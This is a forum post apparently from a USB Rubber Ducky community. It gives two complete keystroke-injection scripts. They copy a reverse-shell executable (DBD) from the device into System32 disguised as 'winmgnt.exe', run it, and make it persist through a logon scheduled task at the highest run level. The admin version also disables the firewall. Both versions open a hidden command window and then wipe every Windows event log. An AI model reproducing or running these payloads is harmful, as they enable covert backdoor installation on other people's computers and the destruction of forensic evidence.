Jump to content

DBD No Download

buzbee

By buzbee
in Classic USB Rubber Ducky

 Share

Recommended Posts

buzbee Newbie

buzbee

Posted
Posted

First Post, here it goes

I love the idea of the simple-ducky payload generator, I however do not love the idea of using powershell to download the dbd reverse shell from a webserver, its sloppy and unpredictable.

Solution - Copy and launch DBD from twin duck flashed ducky!

First you will need to create your dbd executable.

Now navigate to /var/www/ on your linux box and rename winmgnt.txt to winmgnt.exe, copy this to the root of your ducky sd card.

Now for the script

I have included 2 scripts, one for a box with admin rights, the other for standard user rights.

REM *** DBD no downloading with powershell - ADMIN Access ***
REM *** CMD with UAC Bypass ***
DELAY 10000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
REM *** Minimize CMD Windows ***
ENTER
ENTER
ALT SPACE
DELAY 300
STRING M
DELAY 200
DOWNARROW
REPEAT 100
ENTER
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d
ENTER
DELAY 500
REM *** Copy DBD from Duck to HDD and execute DBD ***
STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe
ENTER
DELAY 600
STRING %WINDIR%\System32\winmgnt.exe
ENTER
DELAY 200
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe"
ENTER
REM *** Clear logs and exit CMD ***
ENTER
STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
ENTER
DELAY 2000
ENTER
ENTER
STRING exit
ENTER


REM *** DBD no downloading with powershell - Standard User Access ***
REM *** CMD ***
DELAY 10000
WINDOWS r
DELAY 200
STRING cmd.exe
ENTER
DELAY 3000
ALT y
DELAY 500
REM *** Minimize CMD Windows ***
ENTER
ENTER
ALT SPACE
DELAY 300
STRING M
DELAY 200
DOWNARROW
REPEAT 100
ENTER
ENTER
DELAY 300
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DBD"') do set duck=%d
ENTER
DELAY 500
REM *** Copy DBD from Duck to HDD and execute DBD ***
STRING copy %duck%\winmgnt.exe %WINDIR%\System32\winmgnt.exe
ENTER
DELAY 600
STRING %WINDIR%\System32\winmgnt.exe
ENTER
DELAY 200
STRING schtasks /create /sc onlogon /tn WindowsMgr /rl highest /tr "%WINDIR%\System32\winmgnt.exe"
ENTER
REM *** Clear logs and exit CMD ***
ENTER
STRING for /f %x in ('wevtutil el') do wevtutil cl "%x"
ENTER
DELAY 2000
ENTER
ENTER
STRING exit
ENTER

Hope you enjoy these scripts, if anything is wrong with them please let me know so i can fix them locally.

NOTE - The Volume label of the sd card should be "DBD" to work with the script, but if you know what your doing change that to whatever you want.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...